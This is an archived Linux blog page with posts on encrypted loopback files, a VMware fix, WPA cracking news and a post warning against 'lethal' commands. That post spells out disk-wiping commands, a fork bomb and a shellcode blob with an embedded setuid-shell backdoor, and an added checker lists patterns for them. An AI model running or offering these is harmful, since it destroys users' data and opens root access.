Archive for the 'hacks' Category

16 GB encrypted candy file

Update: since cryptoloop is vulnerable and is not maintained, I don’t recommend the approach below for creating an encrypted file to those of you who require strong security. Use truecrypt to create an encrypted filesystem within a file instead.

Today it came to my mind that it is time to make the sensitive information stored on my USB flash drive encrypted but still transportable and easy to use. But I don’t want to have my whole 32 GB USB drive fully encrypted using truecrypt or something similar. It is just toooo slow. I also don’t want to use GPG for uncompressing files and directories every time I would like to read them and then create a new GPG compressed file every time I save changes. This eats too much of my time and system resources. At the same time it is necessary to be able to use that USB drive under Windows, Mac, Linux, whatever (read/write files) but still have my directory structure with sensitive files encrypted. Here is the solution: create an encrypted filesystem within a file named, say, 16GB.candy.bin that can be stored on a regular Windows-formatted USB flash drive and then mounted under Linux using the password.

When it becomes necessary I can mount that 16GB.candy.bin as a regular ext3 filesystem with all the stuff like permissions, ownership etc. that is available on ext3 but not on FAT or NTFS. On my Windows-formatted flash drive the candy takes only 16 GB, so I can use the rest of the space to store not-so-sensitive information like mp3s, movies or photos. Moreover I on windows or linux to read it.

Let’s create that 16GB.candy.bin file with an encrypted ext3 filesystem (read the explanations below carefully before you copy/paste the commands into the CLI):

[root@artemn root]# cd /path/to/candy/

[root@artemn root]# modprobe cryptoloop

[root@artemn root]# modprobe aes

[root@artemn root]# dd if=/dev/urandom of=16GB.candy.bin bs=1048576 count=16000

[root@artemn root]# losetup -e aes /dev/loop0 16GB.candy.bin

[root@artemn root]# mkfs.ext3 /dev/loop0

[root@artemn root]# tune2fs -i 0 -c 0 /dev/loop0

Here are some points: the commands above create an encrypted file of 16 GB, so if you need more or less, just change “count=16000” in the dd line. “count=16000” means 16GB, so “count=20” means 20MB. The path ‘/path/to/candy/’ is an example only, so you should change it to a real directory that is able to host the encrypted file (16 GB in the example above). The losetup command is present in most Linux distributions (btw I recommend Ubuntu, especially the newly released Lucid Lynx), but if it is not, use your distro’s package manager to install it or compile it from sources (for super geeks only; Mr. Stallman, if you read this article: Hello). Reader, you can replace “/dev/urandom” in the dd line with “/dev/zero”, which will make that command finish faster but will lower the security level of the resulting file, because blocks that were never written stay as plain zeros and reveal which parts of the file hold data (read about AES for better understanding). You will need to enter the password when running the losetup command, so make sure it is safe and long enough, like ‘6U2sAsR37Hn8122dGsaPrew1twt’ but not ‘abc123’ or ‘iloveyou’.
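To make the /dev/urandom versus /dev/zero point concrete, here is an added example (not part of the original post) that shows what someone holding the container file, but not the password, can read off a zero-filled container. Random bytes stand in for real ciphertext, and the block size, function names and written-block list are assumptions made for this illustration.

```python
import os
import tempfile

BLOCK = 4096  # block size chosen for this example

def build_container(path, total_blocks, written, fill):
    """Create a stand-in container: pre-fill it, then overwrite the blocks in
    `written` with random bytes standing in for ciphertext (no real AES here)."""
    with open(path, "wb") as f:
        for _ in range(total_blocks):
            f.write(os.urandom(BLOCK) if fill == "urandom" else bytes(BLOCK))
    with open(path, "r+b") as f:
        for idx in written:
            f.seek(idx * BLOCK)
            f.write(os.urandom(BLOCK))

def used_extents(path):
    """Runs of blocks that are not all-zero, as (first_block, last_block)
    pairs: the layout visible without knowing the password."""
    zero, extents, start, idx = bytes(BLOCK), [], None, 0
    with open(path, "rb") as f:
        while True:
            block = f.read(BLOCK)
            if not block:
                break
            is_zero = block == zero[:len(block)]
            if not is_zero and start is None:
                start = idx                       # a run of data begins
            elif is_zero and start is not None:
                extents.append((start, idx - 1))  # the run ended one block ago
                start = None
            idx += 1
    if start is not None:
        extents.append((start, idx - 1))
    return extents

def demo():
    written = [0, 1, 2, 10, 11, 40]  # constructed: blocks the filesystem touched
    out = {}
    with tempfile.TemporaryDirectory() as d:
        for fill in ("zero", "urandom"):
            path = os.path.join(d, fill + ".bin")
            build_container(path, 64, written, fill)
            out[fill] = used_extents(path)
    return out

if __name__ == "__main__":
    print(demo())
```

With the zero fill the written regions stand out exactly; with the random fill the whole file looks like one uniform run of data.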

Once the commands are done you will get 16GB.candy.bin containing an encrypted ext3 filesystem. You can store this file wherever you want, say, on a flash drive. If you lose it, nobody will be able to open it until he (or she!) has cracked the AES encryption (use long passwords to prevent this). As the next step, mount the filesystem and store some files/directories in it:

[root@artemn root]# mkdir -p /mnt/candy

[root@artemn root]# cd /path/to/candy/

[root@artemn root]# mount -t ext3 -o loop,encryption=aes 16GB.candy.bin /mnt/candy

[root@artemn root]# cd /mnt/candy

[root@artemn root]# #save files, edit them, view or anything you want

[root@artemn root]# cd /

[root@artemn root]# umount /mnt/candy

When you unmount 16GB.candy.bin the changes are already saved there so it’s not required to compress and encrypt anything unlike with GPG.

P.S. This post is inspired by Loopback tricks article. Thanks to the author. Good luck!

13 Linux lethal commands

In this post I will collect all the commands which SHOULD NEVER be executed in Linux. Any of them will cause data loss or corruption, or can freeze or hang a running system.

NEVER RUN THESE COMMANDS IN LINUX BOX CLI!

Even if somebody advises you in forum/im to do it.

1. Any of these commands will erase everything from your home directory or root, or will wipe the whole disk:

  • sudo rm -rf /
  • rm -rf .*
  • dd if=/dev/zero of=/dev/sda
  • mkfs.ext3 /dev/hda
  • whatever > /dev/hda
  • cd ~; for x in `ls`; do mv -f $x $y; y=$x; done
  • find -type f -mtime +30 -exec mv {} /dev/null \;
  • mv ~ /dev/null
  • mv / /dev/null

2. Causes kernel panic or freezes Linux box:

  • dd if=/dev/random of=/dev/port
  • :( ){:|:&};: #also known as fork bomb

3. This one does the same as “rm -rf /”:

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

4. This one will prevent you from executing commands with root rights:

rm -f /usr/bin/sudo;rm -f /bin/su

If you know any other commands that can damage a running Linux system or pose a fatal problem to system administrators, just comment here so I can update this post. Thanks.

Update: See what happens if you execute rm -rf / in Ubuntu: http://www.youtube.com/watch?v=wWOjmvWPRvQ
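As an added example (not from the original post), here is a small Python checker that scans a script for the direct command forms listed above before you run something pasted from a forum or IM. The rule names, the `scan` function and the sample script are constructed for this illustration, and obfuscated variants are not caught.

```python
import re

# Rule labels are names chosen for this example; the patterns mirror the
# command forms listed in the post and do not catch obfuscated variants.
DISK = r"/dev/(?:sd|hd|nvme)\w*"
RULES = [
    ("recursive-rm", r"\brm\s+(?:-\w+\s+)*-\w*[rR]\w*\s+(?:-\w+\s+)*(?:/|~/?|\.\*)(?=\s|;|$)"),
    ("dd-to-device", r"\bdd\b.*\bof=(?:" + DISK + r"|/dev/port\b)"),
    ("mkfs-on-disk", r"\bmkfs(?:\.\w+)?\s+(?:-\S+\s+)*" + DISK),
    ("redirect-to-disk", r">\s*" + DISK),
    ("mv-to-devnull", r"\bmv\b.*\s/dev/null\b"),
    ("fork-bomb", r":\s*\(\s*\)\s*\{.*:\s*\|\s*:.*&"),
    ("removes-sudo-or-su", r"\brm\b.*\s/(?:usr/)?bin/(?:sudo|su)\b"),
    # Long runs of \xNN escapes: bytes you cannot review by reading them.
    ("opaque-hex-bytes", r"(?:\\x[0-9a-fA-F]{2}){8,}"),
]
COMPILED = [(name, re.compile(rx)) for name, rx in RULES]

def scan(text):
    """Return (line_number, rule_name) for every rule hit; comment lines are skipped."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        hits += [(n, name) for name, rx in COMPILED if rx.search(stripped)]
    return hits

# Constructed sample: a script as it might be pasted from a forum reply.
SAMPLE = r"""#!/bin/sh
# cleanup helper
rm -rf ./build
dd if=/dev/urandom of=16GB.candy.bin bs=1048576 count=16000
mkfs.ext3 /dev/loop0
sudo rm -rf /
dd if=/dev/zero of=/dev/sda
find -type f -mtime +30 -exec mv {} /dev/null \;
rm -f /usr/bin/sudo;rm -f /bin/su
char buf[] = "\x41\x41\x41\x41\x41\x41\x41\x41";
"""

if __name__ == "__main__":
    lines = SAMPLE.splitlines()
    for n, rule in scan(SAMPLE):
        print(f"line {n}: {rule}: {lines[n - 1]}")
```

The first five lines of the sample, including the loop-device commands from the encrypted-file post, pass clean; the last five are flagged.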

VMware server console keyboard problem in Ubuntu Intrepid Ibex

A few days ago I upgraded my Ubuntu to the latest 8.10 (Intrepid Ibex) and found that the keyboard just doesn’t work in VMware Server Console. The problem was that I couldn’t use the keyboard under any guest operating system, including Windows, Linux etc. After a few hours of research I found a simple solution which works for me:

$ setxkbmap
$ echo "xkeymap.nokeycodeMap = true" >> ~/.vmware/config

After this, restart vmware-server-console and see if it helps. If not, you can find other solutions to the same problem at this site:
http://nthrbldyblg.blogspot.com/2008/06/vmware-and-fubar-keyboard-effect.html

I hope it helps!

WPA Wi-Fi encryption is now cracked

Network security researcher Erik Tews found a way to break TKIP (Temporal Key Integrity Protocol), used by WPA, in order to read the data being sent from a router to a Wi-Fi laptop or PC. According to statements made by the organizers of the PacSec conference, where Erik will demonstrate the procedure, it takes from 12 to 15 minutes to crack WPA encryption.

PacSec 2008 Conference will be held on November 12/13, 2008, at Aoyama Diamond Hall in Tokyo, Japan. The presentation is planned as “Gone in 900 Seconds, Some Crypto Issues with WPA – Erik Tews”.

WPA (Wi-Fi Protected Access) is widely used to protect many corporate and personal wireless networks. This protocol implements the IEEE 802.11i standard and is a successor of the WEP algorithm, which was cracked in 2001.

Read more here: Once thought safe, WPA Wi-Fi encryption is cracked.

FAQ: How to order pizza from Linux CLI?

Q: How can I order my favourite pizza by using Linux command line interface?

A: Well… You can use the Pizza Party application written by Cory Arcangel and Michael Frumin! Here are some features this outstanding application provides:

  • Can order pizza with only a few keystrokes.
  • Can save pizza preferences.
  • Can use batch files for ordering many pizzas.
  • Has easy to use flags for ordering different toppings.
  • Runs on most UNIX-like operating systems.
  • Supports most currently popular toppings like “mushrooms”, and “pepperoni”!
  • Unattended / background operation.
  • Pizza Party is distributed under the GNU General Public License.

Download Pizza Party’s initial source code here and the Python port from this link.

P.S. This portion of Friday humour is provided by Royal HeHe2-ness! :)




My name is Artem N. (artiomix AT gmail DOT com) and I'm a Linux/Unix and Cisco systems engineer. The main idea of Linux Screw is to share relevant knowledge, skills and observations over The Web. Here you can find a lot of information related to different Linux distributions, FreeBSD, IOS as well as other Open Source stuff.